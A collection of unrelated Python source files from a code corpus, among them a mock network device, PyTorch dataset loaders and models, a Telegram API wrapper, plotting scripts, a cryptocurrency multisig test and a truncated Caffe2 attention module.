import re
import sys
import logging
import argparse
from unicon.mock.mock_device import MockDevice, MockDeviceTcpWrapper
logger = logging.getLogger(__name__)
class MockDeviceSpitfire(MockDevice):
def __init__(self, *args, **kwargs):
super().__init__(*args, device_os='iosxr', **kwargs)
def enable(self, transport, cmd):
if re.match('clock set', cmd):
return True
def spitfire_confirm_switchover(self, transport, cmd):
if cmd == "":
self.command_handler(transport, cmd)
if len(self.transport_ports) > 1:
self.state_change_switchover(transport, 'spitfire_console_standby', 'spitfire_login')
return True
class MockDeviceTcpWrapperSpitfire(MockDeviceTcpWrapper):
def __init__(self, *args, **kwargs):
super().__init__(*args, device_os='iosxr', **kwargs)
if 'port' in kwargs:
kwargs.pop('port')
self.mockdevice = MockDeviceSpitfire(*args, **kwargs)
def main(args=None):
logging.basicConfig(stream=sys.stderr, level=logging.INFO,
format="%(asctime)s [%(levelname)8s]: %(message)s")
if not args:
parser = argparse.ArgumentParser()
parser.add_argument('--state', help='initial state')
parser.add_argument('--ha', action='store_true', help='HA mode')
        parser.add_argument('--hostname', help='Device hostname (default: Router)')
parser.add_argument('-d', action='store_true', help='Debug')
args = parser.parse_args()
if args.d:
logging.getLogger().setLevel(logging.DEBUG)
if args.state:
state = args.state
else:
if args.ha:
state = 'spitfire_login,spitfire_console_standby'
else:
state = 'spitfire_login'
if args.hostname:
hostname = args.hostname
else:
hostname = 'Router'
if args.ha:
md = MockDeviceTcpWrapperSpitfire(hostname=hostname, state=state)
md.run()
else:
md = MockDeviceSpitfire(hostname=hostname, state=state)
md.run()
if __name__ == "__main__":
main()
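
# Example invocations, assuming this module is saved as mock_device_spitfire.py
# (the file name is illustrative):
#   python mock_device_spitfire.py --hostname Router -d
#   python mock_device_spitfire.py --ha --state spitfire_login,spitfire_console_standby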
|
the-stack_106_16891
|
import os
import os.path
import numpy as np
import copy
import torch
from .base import BaseDataset
from . import augmentation as psp_trsform
from torch.utils.data import DataLoader
from torch.utils.data.distributed import DistributedSampler
import random
class city_dset(BaseDataset):
def __init__(self, data_root, data_list, trs_form, seed, n_sup, split='val'):
super(city_dset, self).__init__(data_list)
self.data_root = data_root
self.transform = trs_form
random.seed(seed)
        if len(self.list_sample) >= n_sup and split == 'train':
self.list_sample_new = random.sample(self.list_sample,n_sup)
else:
self.list_sample_new = self.list_sample
def __getitem__(self, index):
# load image and its label
image_path = os.path.join(self.data_root, self.list_sample_new[index][0])
label_path = os.path.join(self.data_root, self.list_sample_new[index][1])
image = self.img_loader(image_path, 'RGB')
label = self.img_loader(label_path, 'L')
image, label = self.transform(image, label)
return image[0], label[0, 0].long()
def __len__(self):
return len(self.list_sample_new)
def build_transfrom(cfg):
trs_form = []
mean, std, ignore_label = cfg['mean'], cfg['std'], cfg['ignore_label']
trs_form.append(psp_trsform.ToTensor())
trs_form.append(psp_trsform.Normalize(mean=mean, std=std))
if cfg.get('resize', False):
trs_form.append(psp_trsform.Resize(cfg['resize']))
if cfg.get('rand_resize', False):
trs_form.append(psp_trsform.RandResize(cfg['rand_resize']))
if cfg.get('rand_rotation', False):
rand_rotation = cfg['rand_rotation']
trs_form.append(psp_trsform.RandRotate(rand_rotation, ignore_label=ignore_label))
if cfg.get('GaussianBlur', False) and cfg['GaussianBlur']:
trs_form.append(psp_trsform.RandomGaussianBlur())
if cfg.get('flip', False) and cfg.get('flip'):
trs_form.append(psp_trsform.RandomHorizontalFlip())
if cfg.get('crop', False):
crop_size, crop_type = cfg['crop']['size'], cfg['crop']['type']
trs_form.append(psp_trsform.Crop(crop_size, crop_type=crop_type, ignore_label=ignore_label))
return psp_trsform.Compose(trs_form)
def build_cityloader(split, all_cfg, seed=0):
cfg_dset = all_cfg['dataset']
cfg_trainer = all_cfg['trainer']
cfg = copy.deepcopy(cfg_dset)
cfg.update(cfg.get(split, {}))
workers = cfg.get('workers', 2)
batch_size = cfg.get('batch_size', 1)
n_sup = cfg.get('n_sup',2975)
# build transform
trs_form = build_transfrom(cfg)
dset = city_dset(cfg['data_root'], cfg['data_list'], trs_form, seed, n_sup, split)
# build sampler
sample = DistributedSampler(dset)
loader = DataLoader(dset, batch_size=batch_size, num_workers=workers,
sampler=sample, shuffle=False, pin_memory=False)
return loader
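
# Minimal usage sketch; the config values below are illustrative placeholders and
# torch.distributed must already be initialised for the DistributedSampler to work:
#
#   cfg = {'dataset': {'mean': [0.485, 0.456, 0.406], 'std': [0.229, 0.224, 0.225],
#                      'ignore_label': 255, 'data_root': '/path/to/cityscapes',
#                      'data_list': 'lists/train.txt', 'workers': 2,
#                      'train': {'batch_size': 2, 'n_sup': 744}},
#          'trainer': {}}
#   train_loader = build_cityloader('train', cfg, seed=0)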
|
the-stack_106_16893
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2019 Esteban J. Garcia Gabancho.
# Copyright (C) 2020 Mojib Wali.
#
# invenio-shibboleth is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Module tests."""
from __future__ import absolute_import, print_function
from flask import Flask
from invenio_shibboleth import Invenioshibboleth
def test_version():
"""Test version import."""
from invenio_shibboleth import __version__
assert __version__
def test_init():
"""Test extension initialization."""
app = Flask("testapp")
ext = Invenioshibboleth(app)
assert "invenio-shibboleth" in app.extensions
app = Flask("testapp")
ext = Invenioshibboleth()
assert "invenio-shibboleth" not in app.extensions
ext.init_app(app)
assert "invenio-shibboleth" in app.extensions
|
the-stack_106_16894
|
import pathlib
import json
import pytest
scriptDir = pathlib.Path(__file__).parent.resolve()
test_data_dir = str(scriptDir) + "/test_data/"
class Helpers:
@staticmethod
def getQueryForTest(filename):
global test_data_dir
f1 = open(test_data_dir + filename + '/query.sql', "r")
# read files
query = f1.read()
# close files
f1.close()
return query
@staticmethod
def getTableLineageResultForTest(filename):
global test_data_dir
f1 = open(test_data_dir + filename + '/tableLineage.json', "r")
# read files
query = f1.read()
# close files
f1.close()
return json.loads(query)
@staticmethod
def getParsedResultForTest(filename):
global test_data_dir
f1 = open(test_data_dir + filename + '/parsed.json', "r")
# read files
query = f1.read()
# close files
f1.close()
return json.loads(query)
@pytest.fixture
def helpers():
return Helpers
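
# Hypothetical example of a test that consumes the fixture above; the data folder
# name 'example_query' and the parse_sql() call are placeholders, not part of this module:
#
#   def test_table_lineage(helpers):
#       query = helpers.getQueryForTest('example_query')
#       expected = helpers.getTableLineageResultForTest('example_query')
#       assert parse_sql(query) == expected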
|
the-stack_106_16895
|
#!/usr/bin/python
# created: Marc 2020
# author: Marc Torrent
# modified:
import numpy as np
import pandas as pd
pi = np.pi
def power_spectral_density(x, time_step, freq_range=None, N_pieces=None):
"""
returns the *single sided* power spectral density of the time trace x which is sampled at intervals time_step
gives the same result as scipy.scipy.signal where N_piece = len(x) / nperseg and window = 'boxcar'
Args:
x (array): timetrace
time_step (float): sampling interval of x
freq_range (array or tuple): frequency range in the form [f_min, f_max] to return only the spectrum within this range
N_pieces: if not None should be integer and the timetrace will be chopped into N_pieces parts, the PSD calculated for each and the avrg PSD is returned
Returns:
"""
if N_pieces is not None:
assert type(N_pieces) is int
F, P = [], []
for x_sub in np.reshape(x[0:int(len(x) / N_pieces) * N_pieces], (N_pieces, int(len(x) / N_pieces))):
F_sub, P_sub = power_spectral_density(x_sub, time_step, freq_range=freq_range, N_pieces=None)
F.append(F_sub)
P.append(P_sub)
F = np.mean(F, axis=0)
P = np.mean(P, axis=0)
else:
N = len(x)
P = 2 * np.abs(np.fft.rfft(x)) ** 2 / N * time_step
F = np.fft.rfftfreq(len(x), time_step)
if freq_range is not None:
brange = np.all([F >= freq_range[0], F <= freq_range[1]], axis=0)
P = P[brange]
F = F[brange]
return F, P
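
if __name__ == '__main__':
    # Minimal usage sketch, not part of the original module: sample a 50 Hz sine at
    # 1 kHz for 2 s and check that the averaged PSD peaks at the sine frequency.
    dt = 1e-3
    t = np.arange(0, 2, dt)
    x = np.sin(2 * pi * 50 * t) + 0.1 * np.random.randn(len(t))
    F, P = power_spectral_density(x, dt, freq_range=[0, 200], N_pieces=4)
    print('PSD peak at %.1f Hz' % F[np.argmax(P)])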
|
the-stack_106_16900
|
import json
import requests
class TelegramApi(object):
"""
"""
URL = "https://api.telegram.org/bot"
def __init__(self, token):
self.token = token
def get_me(self, save=False):
"""
:param save:
:return:
"""
_url = self.URL + self.token + "/getMe"
req = requests.get(_url)
if save:
save_json("telegram_get_me.json", req.json())
return req.json()
def get_updates(self, save=False):
"""
:param save:
:return:
"""
_url = self.URL + self.token + "/getUpdates"
req = requests.get(_url)
if save:
save_json("telegram_get_updates.json", req.json())
return req.json()
def send_message(self, chat_id, text, mode_html=False, save=False):
"""
:param chat_id:
:param text:
:param mode_html:
:param save:
:return:
"""
_url = self.URL + self.token + "/sendMessage"
if mode_html:
data = {"chat_id": chat_id, "text": text, "parse_mode": "HTML"}
else:
data = {"chat_id": chat_id, "text": text}
req = requests.post(_url, json=data)
if save:
save_json("telegram_send_message.json", req.json())
return req.json()
def set_webhook(self, url, save=False):
"""
:param url:
:param save:
:return:
"""
_url = self.URL + self.token + "/setWebhook"
data = {"url": url}
req = requests.post(_url, json=data)
if save:
save_json("telegram_set_webhook.json", req.json())
return req.json()
def delete_webhook(self, save=False):
"""
        Remove the currently registered webhook via the deleteWebhook method.
        :param save: if True, also write the JSON response to telegram_delete_webhook.json
        :return: the decoded JSON response
"""
_url = self.URL + self.token + "/deleteWebhook"
req = requests.get(_url)
if save:
save_json("telegram_delete_webhook.json", req.json())
return req.json()
def get_webhook_info(self, save=False):
"""
        Fetch the current webhook status via the getWebhookInfo method.
        :param save: if True, also write the JSON response to telegram_get_webhook_info.json
        :return: the decoded JSON response
"""
_url = self.URL + self.token + "/getWebhookInfo"
req = requests.get(_url)
if save:
save_json("telegram_get_webhook_info.json", req.json())
return req.json()
def save_json(file, json_data):
"""
    Write json_data to the given file as pretty-printed, UTF-8 JSON.
    :param file: path of the file to write
    :param json_data: JSON-serialisable object to dump
    :return: None
"""
with open(file, "w", encoding="utf8") as f:
json.dump(json_data, f, indent=2, ensure_ascii=False)
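# Usage sketch (the token and chat id below are placeholders, not real credentials):
#
#   api = TelegramApi("123456:ABC-DEF_placeholder_token")
#   print(api.get_me())
#   api.send_message(chat_id=42, text="<b>hello</b>", mode_html=True)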
|
the-stack_106_16903
|
import argparse
import csv
import re
import random
from cycler import cycler
from pathlib import Path
from matplotlib.cm import get_cmap
from matplotlib.lines import Line2D
import matplotlib.pyplot as plt
def cactus_plot(args):
colors = list(get_cmap('tab20').colors)
colors = colors[:-1:2] + colors[1::2]
# random.shuffle(colors)
markers = list(Line2D.filled_markers) + ['x', '.', '+']
num = min(len(colors), len(markers))
# cc = cycler(marker=markers[:num]) + cycler(color=colors[:num])
cc = cycler(color=colors)
plt.rc('axes', prop_cycle=cc)
# mks = iter(['x-', 'o-', 's-', 'v-', '<-', '>-', 'P-', 'd-', '.-', '*-', 'D-'])
i_markers = iter([d + '-' for d in markers])
plt.figure()
if args.baseline:
for fin in sorted(Path(args.baseline_dir).rglob('*.csv')):
if fin.stem == 'final':
continue
px, py = [0], [0]
rtime = []
name = fin.stem
with open(fin) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
sat = row['verdict']
if sat != 'UNKNOWN':
rtime.append(float(row['time']))
rtime.sort()
for i, j in enumerate(rtime):
if j > args.eval_time:
break
px.append(i)
py.append(j)
plt.plot(px, py, label=name, alpha=0.8, markersize=5)
regex = re.compile(args.re)
for fin in sorted(Path(args.input_dir).rglob('*.csv')):
if not regex.match(fin.stem):
continue
if fin.stem == 'final':
continue
px, py = [0], [0]
rtime = []
name = fin.stem
with open(fin) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
sat = row['verdict']
if sat != 'UNKNOWN':
rtime.append(float(row['time']))
rtime.sort()
for i, j in enumerate(rtime):
if j > args.eval_time:
break
px.append(i)
py.append(j)
plt.plot(px, py, i_markers.__next__(), label=name if args.label else None, alpha=0.8, markersize=5)
plt.xlim(0)
plt.ylim(0, args.eval_time)
plt.legend()
plt.xlabel('Number of solved instances')
plt.ylabel('Time (s)')
plt.savefig(Path(args.input_dir) / 'fig.pdf')
def gen_csv4all(args):
# data_point,verdict,time
csv_final = Path(args.input_dir) / 'final.csv'
data_points = []
runtimes = []
fields = ['data_point']
regex = re.compile(args.re)
flag = True
for csvfile in sorted(Path(args.input_dir).rglob('*.csv')):
if not regex.match(csvfile.stem):
continue
        if csvfile.stem == 'final':
continue
fields.append(str(csvfile.stem))
with open(csvfile) as cur:
reader = csv.DictReader(cur)
runtime = []
for row in reader:
if flag:
data_points.append(row['data_point'])
if row['verdict'] != 'UNKNOWN':
runtime.append(float(row['time']))
else:
runtime.append(args.eval_time)
runtimes.append(runtime)
if flag:
flag = False
row_datas = [data_points] + runtimes
col_datas = zip(*row_datas)
with open(csv_final, 'w') as fout:
writer = csv.writer(fout)
writer.writerow(fields)
for col_data in col_datas:
writer.writerow(col_data)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-I', '--input_dir', required=True, type=str)
parser.add_argument('-T', '--eval_time', default=5000, type=float)
parser.add_argument('-R', '--re', default='.*', type=str)
parser.add_argument('-B', '--baseline', action='store_true')
parser.add_argument('-D', '--baseline_dir', default='result/baseline', type=str)
parser.add_argument('-L', '--label', action='store_true')
args = parser.parse_args()
cactus_plot(args)
gen_csv4all(args)
if __name__ == "__main__":
main()
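# Example invocation (script name and paths are hypothetical):
#   python cactus_plot.py -I result/experiment1 -T 3600 -R 'solver_.*' -B -D result/baseline -L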
|
the-stack_106_16904
|
# -*- coding: utf-8 -*-
# Copyright 2021 Cohesity Inc.
class UdaRestoreObjectParams(object):
"""Implementation of the 'UdaRestoreObjectParams' model.
Attributes:
new_object_name (string): The new name of the object, if it is going to
be renamed.
overwrite (bool): Whether to overwrite or keep the object if the
object being recovered already exists in the destination.
restore_time_secs (long|int): The point-in-time to which object needs
to be restored. This allows for the granular recovery of Uda
objects. If this is not set, the Uda object will be restored to
full/incremental snapshot.
"""
# Create a mapping from Model property names to API property names
_names = {
"new_object_name":'newObjectName',
"overwrite":'overwrite',
"restore_time_secs":'restoreTimeSecs'
}
def __init__(self,
new_object_name=None,
overwrite=None,
restore_time_secs=None):
"""Constructor for the UdaRestoreObjectParams class"""
# Initialize members of the class
self.new_object_name = new_object_name
self.overwrite = overwrite
self.restore_time_secs = restore_time_secs
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
new_object_name = dictionary.get('newObjectName')
overwrite = dictionary.get('overwrite')
restore_time_secs = dictionary.get('restoreTimeSecs')
# Return an object of this model
return cls(new_object_name,
overwrite,
restore_time_secs)
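# Usage sketch (the dictionary values are illustrative, not taken from a real response):
#
#   params = UdaRestoreObjectParams.from_dictionary(
#       {'newObjectName': 'db_copy', 'overwrite': True, 'restoreTimeSecs': 1609459200})
#   assert params.new_object_name == 'db_copy' and params.overwrite is True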
|
the-stack_106_16905
|
# Modified from: https://github.com/pliang279/LG-FedAvg/blob/master/models/Nets.py
# credit goes to: Paul Pu Liang
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python version: 3.6
import torch
from torch import nn
import torch.nn.functional as F
from torchvision import models
import json
import numpy as np
from models.language_utils import get_word_emb_arr
class MLP(nn.Module):
def __init__(self, dim_in, dim_hidden, dim_out):
super(MLP, self).__init__()
self.layer_input = nn.Linear(dim_in, 512)
self.relu = nn.ReLU()
self.dropout = nn.Dropout(0)
self.layer_hidden1 = nn.Linear(512, 256)
self.layer_hidden2 = nn.Linear(256, 64)
self.layer_out = nn.Linear(64, dim_out)
self.softmax = nn.Softmax(dim=1)
self.weight_keys = [['layer_input.weight', 'layer_input.bias'],
['layer_hidden1.weight', 'layer_hidden1.bias'],
['layer_hidden2.weight', 'layer_hidden2.bias'],
['layer_out.weight', 'layer_out.bias']
]
def forward(self, x):
x = x.view(-1, x.shape[1]*x.shape[-2]*x.shape[-1])
x = self.layer_input(x)
x = self.relu(x)
x = self.layer_hidden1(x)
x = self.relu(x)
x = self.layer_hidden2(x)
x = self.relu(x)
x = self.layer_out(x)
return self.softmax(x)
class CNNMnist(nn.Module):
def __init__(self, args):
super(CNNMnist, self).__init__()
self.conv1 = nn.Conv2d(1, 64, kernel_size=5)
self.conv2 = nn.Conv2d(64, 64, kernel_size=5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(1024, 128)
self.fc2 = nn.Linear(128, 64)
self.fc3 = nn.Linear(64, args.num_classes)
def forward(self, x):
x = F.relu(F.max_pool2d(self.conv1(x), 2))
x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))
x = x.view(-1, x.shape[1]*x.shape[2]*x.shape[3])
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return F.log_softmax(x, dim=1)
class CNNCifar(nn.Module):
def __init__(self, args):
super(CNNCifar, self).__init__()
self.conv1 = nn.Conv2d(3, 64, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(64, 64, 5)
self.fc1 = nn.Linear(64 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 64)
self.fc3 = nn.Linear(64, args.num_classes)
self.cls = args.num_classes
# self.drop = nn.Dropout(0.6)
self.weight_keys = [['fc1.weight', 'fc1.bias'],
['fc2.weight', 'fc2.bias'],
['fc3.weight', 'fc3.bias'],
['conv2.weight', 'conv2.bias'],
['conv1.weight', 'conv1.bias'],
]
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 64 * 5 * 5)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
# x = self.drop(self.fc3(x))
x = self.fc3(x)
return F.log_softmax(x, dim=1)
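# Usage sketch (argparse.Namespace stands in for the project's real args object;
# num_classes=10 assumes CIFAR-10):
#
#   from argparse import Namespace
#   model = CNNCifar(Namespace(num_classes=10))
#   out = model(torch.randn(4, 3, 32, 32))   # log-probabilities of shape (4, 10)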
class CNNCifar100(nn.Module):
def __init__(self, args):
super(CNNCifar100, self).__init__()
self.conv1 = nn.Conv2d(3, 64, 5)
self.pool = nn.MaxPool2d(2, 2)
self.drop = nn.Dropout(0.6)
self.conv2 = nn.Conv2d(64, 128, 5)
self.fc1 = nn.Linear(128 * 5 * 5, 256)
self.fc2 = nn.Linear(256, 128)
self.fc3 = nn.Linear(128, args.num_classes)
self.cls = args.num_classes
self.weight_keys = [['fc1.weight', 'fc1.bias'],
['fc2.weight', 'fc2.bias'],
['fc3.weight', 'fc3.bias'],
['conv2.weight', 'conv2.bias'],
['conv1.weight', 'conv1.bias'],
]
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 128 * 5 * 5)
x = F.relu(self.fc1(x))
x = self.drop((F.relu(self.fc2(x))))
x = self.fc3(x)
return F.log_softmax(x, dim=1)
class CNN_FEMNIST(nn.Module):
def __init__(self, args):
super(CNN_FEMNIST, self).__init__()
self.conv1 = nn.Conv2d(1, 4, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(4, 12, 5)
self.fc1 = nn.Linear(12 * 4 * 4, 120)
self.fc2 = nn.Linear(120, 100)
self.fc3 = nn.Linear(100, args.num_classes)
self.weight_keys = [['fc1.weight', 'fc1.bias'],
['fc2.weight', 'fc2.bias'],
['fc3.weight', 'fc3.bias'],
['conv2.weight', 'conv2.bias'],
['conv1.weight', 'conv1.bias'],
]
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 12 * 4 * 4)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return F.log_softmax(x, dim=1)
class RNNSent(nn.Module):
"""
Container module with an encoder, a recurrent module, and a decoder.
Modified by: Hongyi Wang from https://github.com/pytorch/examples/blob/master/word_language_model/model.py
"""
def __init__(self,args, rnn_type, ntoken, ninp, nhid, nlayers, dropout=0.5, tie_weights=False, emb_arr=None):
super(RNNSent, self).__init__()
VOCAB_DIR = 'models/embs.json'
emb, self.indd, vocab = get_word_emb_arr(VOCAB_DIR)
self.encoder = torch.tensor(emb).to(args.device)
if rnn_type in ['LSTM', 'GRU']:
self.rnn = getattr(nn, rnn_type)(ninp, nhid, nlayers)
else:
try:
nonlinearity = {'RNN_TANH': 'tanh', 'RNN_RELU': 'relu'}[rnn_type]
except KeyError:
raise ValueError( """An invalid option for `--model` was supplied,
options are ['LSTM', 'GRU', 'RNN_TANH' or 'RNN_RELU']""")
self.rnn = nn.RNN(ninp, nhid, nlayers, nonlinearity=nonlinearity, dropout=dropout)
self.fc = nn.Linear(nhid, 10)
self.decoder = nn.Linear(10, ntoken)
# "Using the Output Embedding to Improve Language Models" (Press & Wolf 2016)
# https://arxiv.org/abs/1608.05859
# and
# "Tying Word Vectors and Word Classifiers: A Loss Framework for Language Modeling" (Inan et al. 2016)
# https://arxiv.org/abs/1611.01462
if tie_weights:
if nhid != ninp:
raise ValueError('When using the tied flag, nhid must be equal to emsize')
self.decoder.weight = self.encoder.weight
self.drop = nn.Dropout(dropout)
self.init_weights()
self.rnn_type = rnn_type
self.nhid = nhid
self.nlayers = nlayers
self.device = args.device
def init_weights(self):
initrange = 0.1
self.fc.bias.data.zero_()
self.fc.weight.data.uniform_(-initrange, initrange)
self.decoder.bias.data.zero_()
self.decoder.weight.data.uniform_(-initrange, initrange)
def forward(self, input, hidden):
input = torch.transpose(input, 0,1)
emb = torch.zeros((25,4,300))
for i in range(25):
for j in range(4):
emb[i,j,:] = self.encoder[input[i,j],:]
emb = emb.to(self.device)
emb = emb.view(300,4,25)
self.rnn.flatten_parameters()
output, hidden = self.rnn(emb, hidden)
output = self.drop(F.relu(self.fc(output)))
decoded = self.decoder(output[-1,:,:])
return decoded.t(), hidden
def init_hidden(self, bsz):
weight = next(self.parameters())
if self.rnn_type == 'LSTM':
return (weight.new_zeros(self.nlayers, bsz, self.nhid),
weight.new_zeros(self.nlayers, bsz, self.nhid))
else:
return weight.new_zeros(self.nlayers, bsz, self.nhid)
|
the-stack_106_16908
|
from typing import Iterator, Optional, Set, Union
from google.cloud.storage import Bucket
from storage_bucket.client import get_client
def list_buckets(
max_results: Optional[int] = None,
page_token: Optional[str] = None,
prefix: Optional[str] = None,
fields: Optional[Set] = None,
projection: str = 'noAcl',
project: Optional[str] = None,
timeout: Union[float, int] = 60,
) -> Set[Bucket]:
"""List Buckets, but return Set[Bucket] instead of ResultE[Set[Bucket]].
    Raise an exception when the underlying Result monad is in a failure state.
"""
client = get_client()
return client.list_buckets(
max_results=max_results,
page_token=page_token,
prefix=prefix,
fields=fields,
projection=projection,
project=project,
timeout=timeout,
)
def list_bucket_names(buckets: Set[Bucket]) -> Iterator[str]:
"""Iterate over Buckets and retrieve their names.
    Raise an AttributeError (on NoneType) when a Bucket is None.
"""
return map(lambda bucket: bucket.name, buckets)
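# Usage sketch (assumes Google Cloud credentials are already configured):
#
#   buckets = list_buckets(prefix='backup-', timeout=30)
#   for name in list_bucket_names(buckets):
#       print(name)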
|
the-stack_106_16913
|
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test new Arvcoin multisig prefix functionality.
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
)
class ScriptAddress2Test(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 3
self.setup_clean_chain = True
self.extra_args = [['-addresstype=legacy', '-deprecatedrpc=accounts', '-txindex=1'], [], ['-txindex=1']]
def setup_network(self, split=False):
self.setup_nodes()
connect_nodes(self.nodes[1], 0)
connect_nodes(self.nodes[2], 0)
self.sync_all()
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
cnt = self.nodes[0].getblockcount()
# Mine some blocks
self.nodes[1].generate(101)
self.sync_all()
if (self.nodes[0].getblockcount() != cnt + 101):
raise AssertionError("Failed to mine 100 blocks")
addr = self.nodes[0].getnewaddress()
addr2 = self.nodes[0].getnewaddress()
multisig_addr = self.nodes[0].addmultisigaddress(2, [addr, addr2], "multisigaccount")['address']
assert_equal(multisig_addr[0], 'Q')
# Send to a new multisig address
txid = self.nodes[1].sendtoaddress(multisig_addr, 1)
self.nodes[1].generate(101)
self.sync_all()
tx = self.nodes[0].getrawtransaction(txid, 1)
dest_addrs = [tx["vout"][0]['scriptPubKey']['addresses'][0],
tx["vout"][1]['scriptPubKey']['addresses'][0]]
assert(multisig_addr in dest_addrs)
# Spend from the new multisig address
addr3 = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr3, 0.8)
self.nodes[0].generate(2)
self.sync_all()
assert(self.nodes[0].getbalance("*", 1) < 0.2)
assert(self.nodes[1].listtransactions()[-1]['address'] == addr3)
# Send to an old multisig address. The api addmultisigaddress
# can only generate a new address so we manually compute
# multisig_addr_old beforehand using an old client.
priv_keys = ["cU7eeLPKzXeKMeZvnEJhvZZ3tLqVF3XGeo1BbM8dnbmV7pP3Qg89",
"cTw7mRhSvTfzqCt6MFgBoTBqwBpYu2rWugisXcwjv4cAASh3iqPt"]
addrs = ["mj6gNGRXPXrD69R5ApjcsDerZGrYKSfb6v",
"mqET4JA3L7P7FoUjUP3F6m6YsLpCkyzzou"]
self.nodes[0].importprivkey(priv_keys[0])
self.nodes[0].importprivkey(priv_keys[1])
multisig_addr_new = self.nodes[0].addmultisigaddress(2, addrs, "multisigaccount2")['address']
assert_equal(multisig_addr_new, 'QZ974ZrPrmqMmm1PSVp4m8YEgo3bCQZBbe')
multisig_addr_old = "2N5nLwYz9qfnGdaFLpPn3gS6oYQbmLTWPjq"
# Let's send to the old address. We can then find it in the
# new address with the new client. So basically the old
# address and the new one are the same thing.
txid = self.nodes[1].sendtoaddress(multisig_addr_old, 1)
self.nodes[1].generate(1)
self.sync_all()
tx = self.nodes[2].getrawtransaction(txid, 1)
dest_addrs = [tx["vout"][0]['scriptPubKey']['addresses'][0],
tx["vout"][1]['scriptPubKey']['addresses'][0]]
assert(multisig_addr_new in dest_addrs)
assert(multisig_addr_old not in dest_addrs)
# Spend from the new multisig address
addr4 = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr4, 0.8)
self.nodes[0].generate(2)
self.sync_all()
assert(self.nodes[0].getbalance("*", 1) < 0.4)
assert(self.nodes[1].listtransactions()[-1]['address'] == addr4)
if __name__ == '__main__':
ScriptAddress2Test().main()
|
the-stack_106_16917
|
## @package attention
# Module caffe2.python.attention
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
class AttentionType:
Regular, Recurrent = range(2)
def s(scope, name):
# We have to manually scope due to our internal/external blob
# relationships.
return "{}/{}".format(str(scope), str(name))
# c_i = \sum_j w_{ij}\textbf{s}_j
def _calc_weighted_context(
model,
encoder_outputs_transposed,
encoder_output_dim,
attention_weights_3d,
scope,
):
# [batch_size, encoder_output_dim, 1]
attention_weighted_encoder_context = model.net.BatchMatMul(
[encoder_outputs_transposed, attention_weights_3d],
s(scope, 'attention_weighted_encoder_context'),
)
# TODO: somehow I cannot use Squeeze in-place op here
# [batch_size, encoder_output_dim]
attention_weighted_encoder_context, _ = model.net.Reshape(
attention_weighted_encoder_context,
[
attention_weighted_encoder_context,
s(scope, 'attention_weighted_encoder_context_old_shape')
],
shape=[1, -1, encoder_output_dim],
)
return attention_weighted_encoder_context
# Calculate a softmax over the passed in attention energy logits
def _calc_attention_weights(
model,
attention_logits_transposed,
scope
):
# TODO: we could try to force some attention weights to be zeros,
# based on encoder_lengths.
# [batch_size, encoder_length]
attention_weights = model.Softmax(
attention_logits_transposed,
s(scope, 'attention_weights'),
engine='CUDNN',
)
# TODO: make this operation in-place
# [batch_size, encoder_length, 1]
attention_weights_3d = model.net.ExpandDims(
attention_weights,
s(scope, 'attention_weights_3d'),
dims=[2],
)
return attention_weights_3d
# e_{ij} = \textbf{v}^T tanh \alpha(\textbf{h}_{i-1}, \textbf{s}_j)
def _calc_attention_logits_from_sum_match(
model,
decoder_hidden_encoder_outputs_sum,
encoder_output_dim,
scope
):
# [encoder_length, batch_size, encoder_output_dim]
decoder_hidden_encoder_outputs_sum = model.net.Tanh(
decoder_hidden_encoder_outputs_sum,
decoder_hidden_encoder_outputs_sum,
)
attention_v = model.param_init_net.XavierFill(
[],
s(scope, 'attention_v'),
shape=[1, encoder_output_dim],
)
model.add_param(attention_v)
attention_zeros = model.param_init_net.ConstantFill(
[],
s(scope, 'attention_zeros'),
value=0.0,
shape=[1],
)
# [encoder_length, batch_size, 1]
attention_logits = model.net.FC(
[decoder_hidden_encoder_outputs_sum, attention_v, attention_zeros],
[s(scope, 'attention_logits')],
axis=2
)
# [encoder_length, batch_size]
attention_logits = model.net.Squeeze(
[attention_logits],
[attention_logits],
dims=[2],
)
# [batch_size, encoder_length]
attention_logits_transposed = model.Transpose(
attention_logits,
s(scope, 'attention_logits_transposed'),
axes=[1, 0],
)
return attention_logits_transposed
# \textbf{W}^\alpha used in the context of \alpha_{sum}(a,b)
def _apply_fc_weight_for_sum_match(
model,
input,
dim_in,
dim_out,
scope,
name
):
output = model.FC(
input,
s(scope, name),
dim_in=dim_in,
dim_out=dim_out,
axis=2,
)
output = model.net.Squeeze(
output,
output,
dims=[0]
)
return output
# Implement RecAtt due to section 4.1 in http://arxiv.org/abs/1601.03317
def apply_recurrent_attention(
model,
